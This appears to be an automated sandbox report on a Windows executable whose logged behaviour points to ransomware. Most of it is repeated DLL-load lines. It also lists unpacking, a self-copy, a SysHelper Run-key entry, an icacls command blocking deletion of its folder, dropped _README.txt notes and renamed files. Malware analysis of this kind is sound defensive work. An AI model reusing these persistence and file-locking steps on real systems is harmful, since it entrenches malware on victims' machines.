          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\Desktop\mU2p71KMss.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: msimg32.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: drprov.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: winsta.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: ntlanman.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: davclnt.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: davhlpr.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: wkscli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: cscapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: browcli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: netapi32.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: msimg32.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: msimg32.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: mpr.dll
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: wininet.dll
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: winmm.dll
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: iphlpapi.dll
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: dnsapi.dll
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: iertutil.dll
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: sspicli.dll
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: windows.storage.dll
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: wldp.dll
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: profapi.dll
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: kernel.appcore.dll
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: ondemandconnroutehelper.dll
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: winhttp.dll
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: mswsock.dll
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: winnsi.dll
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: dpapi.dll
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: msasn1.dll
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: cryptsp.dll
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: rsaenh.dll
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: cryptbase.dll
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: gpapi.dll
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: urlmon.dll
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: srvcli.dll
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: netutils.dll
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: fwpuclnt.dll
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: rasadhlp.dll
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: schannel.dll
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: mskeyprotect.dll
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: ntasn1.dll
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: ncrypt.dll
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exeSection loaded: ncryptsslp.dll
          Source: C:\Users\user\Desktop\mU2p71KMss.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
          Source: Window Recorder Window detected: More than 3 window changes detected
          Source: mU2p71KMss.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: mU2p71KMss.exe, mU2p71KMss.exe, 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, mU2p71KMss.exe, 00000006.00000002.2025228021.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, mU2p71KMss.exe, 00000007.00000002.3243111162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, mU2p71KMss.exe, 00000009.00000002.2156207791.0000000005C80000.00000040.00001000.00020000.00000000.sdmp, mU2p71KMss.exe, 0000000A.00000002.2167150824.0000000000400000.00000040.00000400.00020000.00000000.sdmp, mU2p71KMss.exe, 0000000C.00000002.2241519623.0000000005E10000.00000040.00001000.00020000.00000000.sdmp, mU2p71KMss.exe, 0000000D.00000002.2252233144.0000000000400000.00000040.00000400.00020000.00000000.sdmp
          Source: Binary string: CC:\poviwodi\xik\bihunow44-jeholo43\bikeyomipacase\kagakawotenot.pdb source: mU2p71KMss.exe, mU2p71KMss.exe.1.dr
          Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: mU2p71KMss.exe, 00000000.00000002.1990128449.0000000005DD0000.00000040.00001000.00020000.00000000.sdmp, mU2p71KMss.exe, 00000001.00000002.2007683946.0000000000400000.00000040.00000400.00020000.00000000.sdmp, mU2p71KMss.exe, 00000004.00000002.2012565443.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, mU2p71KMss.exe, 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, mU2p71KMss.exe, 00000006.00000002.2025228021.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, mU2p71KMss.exe, 00000007.00000002.3243111162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, mU2p71KMss.exe, 00000009.00000002.2156207791.0000000005C80000.00000040.00001000.00020000.00000000.sdmp, mU2p71KMss.exe, 0000000A.00000002.2167150824.0000000000400000.00000040.00000400.00020000.00000000.sdmp, mU2p71KMss.exe, 0000000C.00000002.2241519623.0000000005E10000.00000040.00001000.00020000.00000000.sdmp, mU2p71KMss.exe, 0000000D.00000002.2252233144.0000000000400000.00000040.00000400.00020000.00000000.sdmp
          Source: Binary string: C:\poviwodi\xik\bihunow44-jeholo43\bikeyomipacase\kagakawotenot.pdb source: mU2p71KMss.exe, mU2p71KMss.exe.1.dr

          Data Obfuscation

          Source: C:\Users\user\Desktop\mU2p71KMss.exe Unpacked PE file: 1.2.mU2p71KMss.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
          Source: C:\Users\user\Desktop\mU2p71KMss.exe Unpacked PE file: 5.2.mU2p71KMss.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe Unpacked PE file: 7.2.mU2p71KMss.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe Unpacked PE file: 10.2.mU2p71KMss.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe Unpacked PE file: 13.2.mU2p71KMss.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
          Source: C:\Users\user\Desktop\mU2p71KMss.exe Unpacked PE file: 1.2.mU2p71KMss.exe.400000.0.unpack
          Source: C:\Users\user\Desktop\mU2p71KMss.exe Unpacked PE file: 5.2.mU2p71KMss.exe.400000.0.unpack
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe Unpacked PE file: 7.2.mU2p71KMss.exe.400000.0.unpack
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe Unpacked PE file: 10.2.mU2p71KMss.exe.400000.0.unpack
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe Unpacked PE file: 13.2.mU2p71KMss.exe.400000.0.unpack
          Source: C:\Users\user\Desktop\mU2p71KMss.exe Code function: 1_2_00412220 GetCommandLineW,CommandLineToArgvW,PathFindFileNameW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,K32EnumProcesses,OpenProcess,K32EnumProcessModules,K32GetModuleBaseNameW,CloseHandle,1_2_00412220
          Source: C:\Users\user\Desktop\mU2p71KMss.exe Code function: 0_2_00406805 push ecx; ret 0_2_00406818
          Source: C:\Users\user\Desktop\mU2p71KMss.exe Code function: 0_2_0438B0AF push ecx; retf 0_2_0438B0B2
          Source: C:\Users\user\Desktop\mU2p71KMss.exe Code function: 0_2_05DF8F05 push ecx; ret 0_2_05DF8F18
          Source: C:\Users\user\Desktop\mU2p71KMss.exe Code function: 1_2_00428565 push ecx; ret 1_2_00428578
          Source: C:\Users\user\Desktop\mU2p71KMss.exe Code function: 4_2_044AA0AF push ecx; retf 4_2_044AA0B2
          Source: C:\Users\user\Desktop\mU2p71KMss.exe Code function: 4_2_05E08F05 push ecx; ret 4_2_05E08F18
          Source: C:\Users\user\Desktop\mU2p71KMss.exe Code function: 5_2_00428565 push ecx; ret 5_2_00428578
          Source: C:\Users\user\Desktop\mU2p71KMss.exe File created: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe File created: C:\Users\user\Desktop\mU2p71KMss.exe
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe File created: C:\Users\user\Desktop\mU2p71KMss.exe.bgzq (copy)
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe File created: C:\_README.txt
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe File created: C:\Users\user\_README.txt
          Source: C:\Users\user\Desktop\mU2p71KMss.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysHelper
          Source: C:\Users\user\Desktop\mU2p71KMss.exeCode function: 0_2_00405653 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00405653
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
          Source: C:\Users\user\Desktop\mU2p71KMss.exe Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a" /deny *S-1-1-0:(OI)(CI)(DE,DC)
          Source: C:\Users\user\Desktop\mU2p71KMss.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\mU2p71KMss.exe Code function: 0_2_0438971C rdtsc 0_2_0438971C
          Source: C:\Users\user\Desktop\mU2p71KMss.exe Code function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free,1_2_0040E670
          Source: C:\Users\user\Desktop\mU2p71KMss.exe Code function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free,5_2_0040E670
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe Dropped PE file which has not been started: C:\Users\user\Desktop\mU2p71KMss.exe
          Source: C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe Dropped PE file which has not been started: C:\Users\user\Desktop\mU2p71KMss.exe.bgzq (copy)
          Source: C:\Users\user\Desktop\mU2p71KMss.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess graph_1-45021
          Source: C:\Users\user\Desktop\mU2p71KMss.exe API coverage: 4.6 %
          Source: C:\Users\user\Desktop\mU2p71KMss.exe Code function: 1_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,1_2_00410160
          Source: C:\Users\user\Desktop\mU2p71KMss.exe Code function: 1_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,1_2_0040F730
          Source: C:\Users\user\Desktop\mU2p71KMss.exe Code function: 1_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,1_2_0040FB98
          Source: C:\Users\user\Desktop\mU2p71KMss.exe Code function: 5_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,5_2_00410160
          Source: C:\Users\user\Desktop\mU2p71KMss.exe Code function: 5_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,5_2_0040F730
          Source: C:\Users\user\Desktop\mU2p71KMss.exe Code function: 5_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,5_2_0040FB98
          Source: mU2p71KMss.exe, 00000005.00000002.2025045423.0000000000706000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWhKw%SystemRoot%\system32\mswsock.dll
